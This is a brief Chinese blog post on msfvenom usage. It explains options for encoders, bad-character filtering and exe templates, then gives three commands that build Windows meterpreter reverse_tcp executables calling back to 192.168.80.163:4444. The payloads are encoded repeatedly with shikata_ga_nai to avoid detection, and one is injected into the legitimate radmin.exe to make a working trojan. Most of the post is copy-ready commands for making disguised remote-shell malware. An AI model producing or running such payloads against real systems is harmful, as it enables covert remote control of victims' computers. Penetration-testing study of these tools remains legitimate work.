msfvenom使用

2017-05-10  本文已影响0人  Instu

--list 列出所有可用的payloads,encoders,nops

--help-formats 查看支持的输出格式

-b 指定需要过滤的坏字符,使用-b选项后,会自动选择编码方式

-e 指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload

-i 指定payload的编码次数

-x 指定一个exe文件作为模板

-k 保护模板程序的功能,注入的payload作为一个新的进程运行


root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o a.exe

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -b '\x00\xff' -i 10 -f exe -o b.exe

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -e x86/shikata_ga_nai -k -x /usr/share/windows-binaries/radmin.exe -f exe -o radmin.exe

上一篇下一篇

猜你喜欢

热点阅读